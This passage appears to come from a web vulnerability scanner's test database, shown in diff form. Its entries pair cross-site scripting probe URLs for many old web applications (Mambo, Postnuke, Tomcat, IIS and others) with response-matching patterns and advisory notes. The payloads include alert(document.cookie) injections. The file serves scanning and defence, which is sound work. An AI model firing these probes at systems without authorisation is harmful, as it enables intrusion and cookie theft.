('Vulnerable')</script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""743 "000721","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>","GET","<script>alert ('Vulnerable')</script+>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""744 "000722","0","4","/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef","GET","<script>alert ('Vulnerable');</script>","","","","","Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""745 "000723","59015","4","/addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>","GET","<script>alert ('Vulnerable')</script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""746 "000724","0","4","/666%0a%0a<script>alert('Vulnerable');</script>666.jsp","GET","<script>alert ('Vulnerable');</script>","","","","","Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""747 "000725","0","4","/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""748 "000726","0","4","/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""749 "000727","0","4","/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""750 "000728","0","4","/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""751 "000729","0","4","/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""752 "000730","0","4","/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. CA-2000-02.","",""753 "000731","0","4","/<script>alert('Vulnerable')</script>.shtm","GET","<script>alert ('Vulnerable')</script>.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""754 "000732","0","4","/<script>alert('Vulnerable')</script>.stm","GET","<script>alert ('Vulnerable')</script>.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""755 "000733","0","4","/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. CA-2000-02.","",""756 "000734","17665","4","/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Site Server is vulnerable to Cross Site Scripting","",""757 "000735","17666","4","/_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Site Server is vulnerable to Cross Site Scripting","",""758 "000736","0","4","/nosuchurl/><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","",""759 "000737","9216","4","/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert ('Vulnerable')</SCRIPT>","","","","","OmniHTTPD's test.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""760 "000738","9217","4","/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert ('Vulnerable')</SCRIPT>","","","","","OmniHTTPD's test.shtml is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""761 "000739","9218","4","@CGIDIRSredir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E","GET","<script>alert ('Vulnerable')</script>","","","","","OmniHTTPD's redir.exe is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""762 "000740","0","4","/search/results.stm?query=<script>alert('vulnerable');</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Default Sambar file is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""763 "000741","3624","4","/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""764 "000742","9234","4","@CGIDIRSYaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""765 "000743","0","4","@CGIDIRSvq/demos/respond.pl?<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. CA-2000-02.","",""766 "000744","6458","4","@CGIDIRSviewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;","GET","<script>alert ('Vulnerable')</script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""767 "000745","6458","4","@CGIDIRSviewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""768 "000746","8391","4","@CGIDIRSurlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E","GET","<script>alert ('Vulnerable')</script>","","","","","urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""769 "000747","0","4","@CGIDIRStest-cgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Default CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""770 "000748","0","4","@CGIDIRSstart.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert ('Vulnerable')</script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""771 "000749","9230","4","@CGIDIRSsearch.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to FDSE version 2.0.0.0055","",""772 "000750","2322","4","@CGIDIRSsearch.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","",""773 "000751","8392","4","@CGIDIRSpbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E","GET","<script>alert ('Vulnerable')</script>","","","","","Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""724 "000702","7501","4","/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 725 "000703","0","4","/index.php?option=search&searchword=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 726 "000704","7505","4","/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 727 "000705","7504","4","/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 728 "000706","7503","4","/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 729 "000707","0","4","/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 730 "000708","7495","4","/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 731 "000709","7498","4","/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 732 "000710","7499","4","/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 733 "000711","7497","4","/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 734 "000712","7496","4","/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 735 "000713","2820","4","/index.php?dir=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.","","" 736 "000714","0","4","/https-admserv/bin/index?/<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.","","" 737 "000715","2876","4","/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.","","" 738 "000716","0","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","\[SQL SERVER\] Error Code","","","","","ColdFusion may reveal SQL information in malformed requests.","","" 739 "000717","0","4","/upload.php?type=\"<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 740 "000718","4619","4","/soinfo.php?\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.","","" 741 "000719","0","4","/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","","" 742 "000720","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","","" 743 "000721","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>","GET","<script>alert\('Vulnerable'\)<\/script\+>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","","" 744 "000722","0","4","/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 745 "000723","59015","4","/addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 746 "000724","0","4","/666%0a%0a<script>alert('Vulnerable');</script>666.jsp","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 747 "000725","0","4","/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 748 "000726","0","4","/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","","" 749 "000727","0","4","/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","","" 750 "000728","0","4","/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","","" 751 "000729","0","4","/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","","" 752 "000730","0","4","/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. CA-2000-02.","","" 753 "000731","0","4","/<script>alert('Vulnerable')</script>.shtm","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 754 "000732","0","4","/<script>alert('Vulnerable')</script>.stm","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 755 "000733","0","4","/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. CA-2000-02.","","" 756 "000734","17665","4","/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Site Server is vulnerable to Cross Site Scripting","","" 757 "000735","17666","4","/_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Site Server is vulnerable to Cross Site Scripting","","" 758 "000736","0","4","/nosuchurl/><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","","" 759 "000737","9216","4","/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","OmniHTTPD's test.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 760 "000738","9217","4","/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","OmniHTTPD's test.shtml is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 761 "000739","9218","4","@CGIDIRSredir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","OmniHTTPD's redir.exe is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 762 "000740","0","4","/search/results.stm?query=<script>alert('vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Default Sambar file is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 763 "000741","3624","4","/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 764 "000742","9234","4","@CGIDIRSYaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 765 "000743","0","4","@CGIDIRSvq/demos/respond.pl?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. CA-2000-02.","","" 766 "000744","6458","4","@CGIDIRSviewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","","" 767 "000745","6458","4","@CGIDIRSviewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","","" 768 "000746","8391","4","@CGIDIRSurlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 769 "000747","0","4","@CGIDIRStest-cgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Default CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 770 "000748","0","4","@CGIDIRSstart.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 771 "000749","9230","4","@CGIDIRSsearch.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to FDSE version 2.0.0.0055","","" 772 "000750","2322","4","@CGIDIRSsearch.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","","" 773 "000751","8392","4","@CGIDIRSpbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 774 774 "000752","0","4","@CGIDIRSmyguestbook.cgi?action=view","GET","200","","","","","myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. CA-2000-02.","","" 775 "000753","4458","4","@CGIDIRSlogin.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT>","GET","<script>alert ('Vulnerable')</script>","","","","","BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""776 "000754","7590","4","@CGIDIRShtsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E","GET","<script>alert ('Vulnerable')</script>","","","","","htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""777 "000755","0","4","@CGIDIRSFormMail.cgi?<script>alert(\"Vulnerable\");</script>","GET","<script>alert (\"Vulnerable\");</script>","","","","","FormMail.cgi allows Cross Site Scripting (XSS). CA-2000-02.","",""778 "000756","8661","4","@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable","GET","<script>alert ('Vulnerable')</script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html","",""779 "000757","54110","4","@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02.","",""780 "000758","0","4","@CGIDIRSerba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert ('Vulnerable')</script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""775 "000753","4458","4","@CGIDIRSlogin.pl?course_id=\"><SCRIPT>alert('Vulnerable')</SCRIPT>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 776 "000754","7590","4","@CGIDIRShtsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 777 "000755","0","4","@CGIDIRSFormMail.cgi?<script>alert(\"Vulnerable\");</script>","GET","<script>alert\(\"Vulnerable\"\);<\/script>","","","","","FormMail.cgi allows Cross Site Scripting (XSS). CA-2000-02.","","" 778 "000756","8661","4","@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html","","" 779 "000757","54110","4","@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02.","","" 780 "000758","0","4","@CGIDIRSerba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 781 781 "000759","21366","4","@CGIDIRSdiagnose.cgi","GET","200","","","","","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 782 "000760","2748","4","@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable');</script>","","","","","CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. CA-2000-02.","",""783 "000761","651","4","@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""784 "000762","5031","4","@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;","GET","<script>alert ('Vulnerable')</script>","","","","","BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02.","",""785 "000763","21556","4","@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=","GET","<script>alert ('Vulnerable')</script>","","","","","Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""786 "000764","58958","4","@CGIDIRSathcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['","GET","<script>alert ('Vulnerable')</script>","","","","","Authoria HR Suite is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""787 "000765","9283","4","@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""788 "000766","9283","4","@CGIDIRS.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>","GET","img src=javascript:alert ('Vulnerable')","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""789 "000767","0","4","/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null","GET","<script>alert ('Vulnerable')</script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02","",""790 "000768","0","4","/~/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert ('Vulnerable')</script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02","",""791 "000769","0","4","/~/<script>alert('Vulnerable')</script>.asp","GET","<script>alert ('Vulnerable')</script>","","","","","Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02","",""792 "000770","58957","4","/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&","GET","<script>alert (document.cookie)</script>","","","","","orum 2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""782 "000760","2748","4","@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. CA-2000-02.","","" 783 "000761","651","4","@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 784 "000762","5031","4","@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02.","","" 785 "000763","21556","4","@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 786 "000764","58958","4","@CGIDIRSathcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Authoria HR Suite is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 787 "000765","9283","4","@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 788 "000766","9283","4","@CGIDIRS.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>","GET","img src=javascript:alert\('Vulnerable'\)","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 789 "000767","0","4","/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02","","" 790 "000768","0","4","/~/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02","","" 791 